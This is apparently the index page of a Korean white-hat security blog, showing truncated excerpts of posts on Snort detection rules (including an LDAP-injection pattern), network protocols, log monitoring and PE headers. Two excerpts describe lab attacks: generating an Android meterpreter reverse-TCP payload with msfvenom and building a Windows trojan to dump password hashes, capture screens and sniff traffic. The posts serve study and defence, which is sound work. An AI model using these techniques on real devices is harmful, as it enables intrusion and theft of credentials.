화이트해커 루나 블로그 💻

# Alert for LDAP Injection alert tcp any any -> 14.128.64.3 80 ( \ msg:"LDAP injection detected"; \ gid:1000007; \ sid:1000018; \ rev:1; \ pcre:"/^(\(|cn=|\*|ldap:\/|uid=|userPassword=|version=|(&|\|){2})/Ui"; \ ) # Alert for Directory Indexing alert tcp any any -> 14.128.64.3 80 ( \ msg:"Directory indexing detected"; \ gid:1000007; \ sid:1000019; \ rev:1; \ content:"Index of /"; \ nocase; \ fil..

TAP, IPSEC, VPN, LB, NAT, Subnet TAP, IPSEC, VPN, LB, NAT, Subnet은 모두 네트워크 관련 기술이다. -목차- 0. 선요약 1. TAP 2. IPSEC 3. VPN 4. LB 5. NAT 6. Subnet 7. 상호 연관 0. 선요약 TAP, IPSEC, VPN, LB, NAT, Subnet은 모두 네트워크에서 사용되는 기술이며, 이들 각각은 서로 다른 기능과 목적을 가지고 있다. 하지만 이들은 상호 연관되어 있기도 하다. VPN과 IPSEC은 보안 통신을 위한 기술로, 데이터를 암호화하고 인증하는 등의 기능을 수행한다. VPN은 Virtual Private Network의 약자로, 인터넷 등의 공개된 네트워크를 통해 안전하게 데이터를 전송하기 위한 가상 ..

1. XFF XFF란 무엇인가? XFF는 HTTP 요청 헤더 필드 중 하나로, 클라이언트 IP 주소를 전송하는 데 사용됩니다. 일반적으로 웹 서버는 요청을 받으면 클라이언트 IP 주소를 확인하여 응답을 반환합니다. 그러나 프록시나 로드 밸런서와 같은 미들웨어를 거치면, 웹 서버는 클라이언트의 실제 IP 주소를 확인하지 못합니다. 이 때 XFF 헤더를 사용하면, 미들웨어를 통해 거친 클라이언트의 IP 주소를 웹 서버에 전달할 수 있습니다. 왜 XFF가 필요한가? XFF는 웹 서버에서 클라이언트의 IP 주소를 확인하는 데 필요합니다. 보안적인 이유로 클라이언트 IP 주소를 알아야 하는 경우가 많습니다. 예를 들어, 웹 애플리케이션의 로그 분석을 통해 악성 공격을 탐지하거나, 접속을 차단할 IP 주소를 설정할..

snort rule 만드는법 Snort는 네트워크 공격을 탐지하고 방지하는 데 사용할 수 있는 오픈소스 IDS(침입 탐지 시스템)이다. Snort rule을 만드는 기본 프로세스 모니터링할 트래픽 결정: 모니터링할 트래픽을 식별하고 이에 대한 특정 규칙을 만든다. 규칙 헤더 정의: 프로토콜, 원본 및 대상 IP 주소와 포트를 포함하는 규칙의 헤더를 정의한다. 규칙 옵션 만들기: 일치 항목이 발견될 때 수행할 내용, 방향 및 작업을 지정하는 규칙의 옵션을 정의한다. 규칙 테스트 및 미세 조정: 규칙을 테스트하여 올바르게 작동하는지 확인하고 조정한다. HTTP GET 요청을 탐지하는 Snort rule 만들기 alert tcp any any -> any 80 (msg:"HTTP GET Request"; fl..

URL과 URI -목차- 1. URL과 URI 정의 2. URL과 URI 차이점 3. URL과 URI 취약점 1. URL과 URI 정의 URL (유니폼 리소스 로케이터) URL은 인터넷 상의 리소스를 나타내는 문자열입니다. 일반적으로 인터넷 상의 웹페이지나 파일 등에 접근하기 위한 주소로 사용됩니다. URL은 다음과 같은 구성요소로 이루어져 있습니다. 프로토콜(Protocol): 인터넷 상에서 리소스에 접근하기 위해 사용되는 프로토콜을 명시합니다. 예를 들어, HTTP, HTTPS, FTP 등이 있습니다. 호스트명(Host Name): 리소스가 위치한 서버의 도메인 이름 또는 IP 주소를 명시합니다. 포트(Port): 서버에서 제공되는 서비스에 접근하기 위한 포트 번호를 명시합니다. 대부분의 프로토콜은 ..

# tail -f /var/log/secure 위 명령어를 쓰면 원격 로그를 실시간으로 볼 수 있다. 근데 내용이 너무 많아서 실시간으로 하나씩만 보고싶다면 # tail -n 1 -f /var/log/secure 이렇게하면 종료되지 않고 계속 마지막내용이 추가될때마다 실시간으로보여줌. 근데 이것도 너무많으면 그냥 failed password Accepted password 로그만 따로 목록화해서 로그인시도와 성공여부만 확인할 수도 잇음 # egrep "Failed password|Accepted password" /var/log/secure 위방법을 쓰면 실시간조회보단 목록을 쭉 뽑고 판다스로 해서 보고서 작성에 유리하다.

Windows PE구조와 NT헤더 Windows PE(Portable Executable)는 Windows 운영 체제에서 실행 파일, DLL 및 기타 유형의 파일에 사용되는 파일 형식이다. 형식에는 운영 체제가 프로그램을 로드하고 실행하는 데 사용하는 정보가 포함된 NT 헤더가 포함된다. NT 헤더의 구조와 구성 요소를 이해하는 것은 Windows PE 파일을 분석하고 리버스 엔지니어링을 하는 데 필수적이다. -목차- 1. Windows PE 개요 2. NT 헤더 개요 3. Windows PE 작업과 리버싱 4. Windows PE 및 NT 헤더의 취약성 1. Windows PE 개요 Windows PE의 정의 WinPE(Windows PE)는 Windows 데스크톱 버전, Windows Server 및..

TCP/IP와 취약점 TCP(Transmission Control Protocol)와 IP(Internet Protocol)는 네트워크 통신에 사용되는 프로토콜로, TCP는 장치 간의 안정적인 데이터 전송을 담당하는 전송 계층 프로토콜이고, IP는 데이터 패킷을 목적지로 라우팅하는 역할을 하는 네트워크 계층 프로토콜이다. -목차- 1. TCP/IP 계층과 취약점 2. TCP 헤더와 취약점 3. IP 헤더와 취약점 4. TCP/IP 관계 5. TCP/IP 연결과 취약점 1. TCP/IP 계층과 취약점 TCP/IP 계층은 Application(애플리케이션) 계층, Transport(전송) 계층, Internet(IP계층)계층 및 Link(네트워크 액세스) 계층의 4개 계층으로 나뉜다. 각 계층에는 네트워크를..

안드로이드 삼성폰 침투테스트(갤럭시Z플립2) 안드로이드 버전은 12입니다. -목차- 1. 안드로이드 환경 구축 2. 안드로이드 악성코드 제작 3. 안드로이드 악성코드 실행 4. 안드로이드 Commands 1. 안드로이드 환경 구축 ipDISK 어플 설치 많은 어플이 있지만, ipDISK어플을 사용했습니다. NAS서버 구축 ping 확인 # ping -c 2 192.168.0.213 2. 안드로이드 악성코드 제작 아키텍쳐와 플랫폼 보기 # msfvenom --payload=android/meterpreter_reverse_tcp -o a [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No a..

미터프리터를 활용한 정보수집 (+멀웨어 트로이목마 만들기) 미터프리터(Meterpreter)란 메모리 DLL 삽입 기법을 적용한 페이로드다. 스테이저(Stager)라는 소켓으로 통신하고 루비API를 제공한다. 즉, 원격으로 상대PC를 맘껏 조종할 수 있다. 윈도우에 침투하기위해 멀웨어(트로이목마)를 생성하고, 침투 후 미터프리터 방식에서 제공하는 기능을 활용하는 방법을 정리했다. 공격대상자는 Window10Pro(192.168.0.20) 공격자는 칼리리눅스(192.168.0.59)다. -목차- 1. 멀웨어 생성하기 2. 멀웨어 다운로드 (FTP) 3. MSF 실행 4. 윈도우 계정정보 알아내기 (hashdump) 5. 화면 캡쳐하기 6. 실시간 스니핑 1. 멀웨어 생성하기 파일생성전 vsftpd 설치를 ..